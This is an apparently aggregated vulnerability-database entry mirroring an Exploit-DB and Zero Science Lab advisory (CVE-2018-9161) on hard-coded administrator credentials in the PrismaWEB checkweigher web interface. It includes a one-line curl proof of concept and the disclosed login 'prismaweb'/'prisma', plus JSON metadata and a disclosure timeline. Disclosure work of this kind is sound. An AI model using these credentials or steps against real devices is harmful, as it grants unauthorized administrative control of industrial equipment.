Search...

Prisma Industriale Checkweigher PrismaWEB 1.21 - Hard-Coded Credentials

2018-03-12T00:00:00

ID EDB-ID:44276
Type exploitdb
Reporter Exploit-DB
Modified 2018-03-12T00:00:00

Description

Prisma Industriale Checkweigher PrismaWEB 1.21 - Hard-Coded Credentials. Webapps exploit for Multiple platform

                                        
                                            Prisma Industriale Checkweigher PrismaWEB 1.21 Authentication Bypass


Vendor: Prisma Industriale S.r.l.
Product web page: https://www.prismaindustriale.com
Affected version: 1.0 (Rev 21, EPROM 202FWSAM ??)

Summary: Web Administration of Machine.

Desc: The vulnerability exists due to the disclosure of hard-coded credentials allowing
an attacker to effectively bypass authentication of PrismaWEB with administrator
privileges. The credentials can be disclosed by simply navigating to the login_par.js
JavaScript page that holds the username and password for the management interface that
are being used via the Login() function in /scripts/functions_cookie.js script.

Tested on: HMS AnyBus-S WebServer


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2018-5453
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5453.php

06.02.2018

---


$ curl http://10.10.10.70/user/scripts/login_par.js
// JavaScript Document
// 11 Dicembre 2009 Release 1.0 Rev.10

var txtChkUser				= "prismaweb";	// Nome utente Login
var txtChkPassword 			= "prisma";		// Password Login

JSON Vulners Source

Initial Source

{"id": "EDB-ID:44276", "hash": "a90fce3f0cdcf4fe1144aa766691fdfe", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Prisma Industriale Checkweigher PrismaWEB 1.21 - Hard-Coded Credentials", "description": "Prisma Industriale Checkweigher PrismaWEB 1.21 - Hard-Coded Credentials. Webapps exploit for Multiple platform", "published": "2018-03-12T00:00:00", "modified": "2018-03-12T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/44276/", "reporter": "Exploit-DB", "references": [], "cvelist": ["CVE-2018-9161"], "lastseen": "2018-05-24T14:07:20", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 7.5, "vector": "NONE", "modified": "2018-05-24T14:07:20"}, "vulnersScore": 7.5}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/44276/", "sourceData": "Prisma Industriale Checkweigher PrismaWEB 1.21 Authentication Bypass\r\n\r\n\r\nVendor: Prisma Industriale S.r.l.\r\nProduct web page: https://www.prismaindustriale.com\r\nAffected version: 1.0 (Rev 21, EPROM 202FWSAM ??)\r\n\r\nSummary: Web Administration of Machine.\r\n\r\nDesc: The vulnerability exists due to the disclosure of hard-coded credentials allowing\r\nan attacker to effectively bypass authentication of PrismaWEB with administrator\r\nprivileges. The credentials can be disclosed by simply navigating to the login_par.js\r\nJavaScript page that holds the username and password for the management interface that\r\nare being used via the Login() function in /scripts/functions_cookie.js script.\r\n\r\nTested on: HMS AnyBus-S WebServer\r\n\r\n\r\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n @zeroscience\r\n\r\n\r\nAdvisory ID: ZSL-2018-5453\r\nAdvisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5453.php\r\n\r\n06.02.2018\r\n\r\n---\r\n\r\n\r\n$ curl http://10.10.10.70/user/scripts/login_par.js\r\n// JavaScript Document\r\n// 11 Dicembre 2009 Release 1.0 Rev.10\r\n\r\nvar txtChkUser\t\t\t\t= \"prismaweb\";\t// Nome utente Login\r\nvar txtChkPassword \t\t\t= \"prisma\";\t\t// Password Login", "osvdbidlist": [], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}

{"cve": [{"lastseen": "2018-05-12T10:39:17", "references": ["https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5453.php", "https://www.exploit-db.com/exploits/44276/"], "description": "Prisma Industriale Checkweigher PrismaWEB 1.21 allows remote attackers to discover the hardcoded prisma password for the prismaweb account by reading user/scripts/login_par.js.", "edition": 2, "reporter": "NVD", "published": "2018-03-31T18:29:00", "title": "CVE-2018-9161", "type": "cve", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2018-9161"], "scanner": [], "modified": "2018-05-11T13:04:27", "cpe": ["cpe:/a:prismaindustriale:checkweigher_prismaweb:1.21"], "id": "CVE-2018-9161", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-9161", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "zeroscience": [{"lastseen": "2018-08-31T00:35:53", "references": [], "description": "Title: Prisma Industriale Checkweigher PrismaWEB 1.21 Authentication Bypass \nAdvisory ID: [ZSL-2018-5453](<ZSL-2018-5453.php>) \nType: Local/Remote \nImpact: DoS, Security Bypass, System Access \nRisk: (5/5) \nRelease Date: 10.03.2018 \n\n\n##### Summary\n\nWeb Administration of Machine. \n\n##### Description\n\nThe vulnerability exists due to the disclosure of hard-coded credentials allowing an attacker to effectively bypass authentication of PrismaWEB with administrator privileges. The credentials can be disclosed by simply navigating to the login_par.js JavaScript page that holds the username and password for the management interface that are being used via the Login() function in /scripts/functions_cookie.js script. \n\n##### Vendor\n\nPrisma Industriale S.r.l. - <https://www.prismaindustriale.com>\n\n##### Affected Version\n\n1.0 (Rev 21, EPROM 202FWSAM ??) \n\n##### Tested On\n\nHMS AnyBus-S WebServer \n\n##### Vendor Status\n\n[06.02.2018] Vulnerability discovered. \n[19.02.2018] Vendor contacted. \n[09.03.2018] No response from the vendor. \n[10.03.2018] Public security advisory released. \n\n##### PoC\n\n[prismaweb_auth.txt](<../../codes/prismaweb_auth.txt>)\n\n##### Credits\n\nVulnerability discovered by Gjoko Krstic - <[gjoko@zeroscience.mk](<mailto:gjoko@zeroscience.mk>)>\n\n##### References\n\n[1] <https://exchange.xforce.ibmcloud.com/vulnerabilities/140264> \n[2] <https://packetstormsecurity.com/files/146726> \n[3] <https://cxsecurity.com/issue/WLB-2018030101> \n[4] <https://www.exploit-db.com/exploits/44276/> \n[5] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9161> \n[6] <https://nvd.nist.gov/vuln/detail/CVE-2018-9161>\n\n##### Changelog\n\n[10.03.2018] - Initial release \n[16.03.2018] - Added reference [1], [2], [3] and [4] \n[19.04.2018] - Added reference [5] and [6] \n\n##### Contact\n\nZero Science Lab \n \nWeb: <http://www.zeroscience.mk> \ne-mail: [lab@zeroscience.mk](<mailto:lab@zeroscience.mk>)\n", "edition": 7, "reporter": "Gjoko Krstic", "published": "2018-03-10T00:00:00", "title": "Prisma Industriale Checkweigher PrismaWEB 1.21 Authentication Bypass", "type": "zeroscience", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2018-9161"], "modified": "2018-03-10T00:00:00", "id": "ZSL-2018-5453", "href": "http://zeroscience.mk/en/vulnerabilities/ZSL-2018-5453.php", "sourceData": "\r\nPrisma Industriale Checkweigher PrismaWEB 1.21 Authentication Bypass\r\n\r\n\r\nVendor: Prisma Industriale S.r.l.\r\nProduct web page: https://www.prismaindustriale.com\r\nAffected version: 1.0 (Rev 21, EPROM 202FWSAM ??)\r\n\r\nSummary: Web Administration of Machine.\r\n\r\nDesc: The vulnerability exists due to the disclosure of hard-coded credentials allowing\r\nan attacker to effectively bypass authentication of PrismaWEB with administrator\r\nprivileges. The credentials can be disclosed by simply navigating to the login_par.js\r\nJavaScript page that holds the username and password for the management interface that\r\nare being used via the Login() function in /scripts/functions_cookie.js script.\r\n\r\nTested on: HMS AnyBus-S WebServer\r\n\r\n\r\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n @zeroscience\r\n\r\n\r\nAdvisory ID: ZSL-2018-5453\r\nAdvisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5453.php\r\n\r\n06.02.2018\r\n\r\n---\r\n\r\n\r\n$ curl http://10.10.10.70/user/scripts/login_par.js\r\n// JavaScript Document\r\n// 11 Dicembre 2009 Release 1.0 Rev.10\r\n\r\nvar txtChkUser\t\t\t\t= \"prismaweb\";\t// Nome utente Login\r\nvar txtChkPassword \t\t\t= \"prisma\";\t\t// Password Login\r\n\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "http://zeroscience.mk/en/vulnerabilities/../../codes/prismaweb_auth.txt"}]}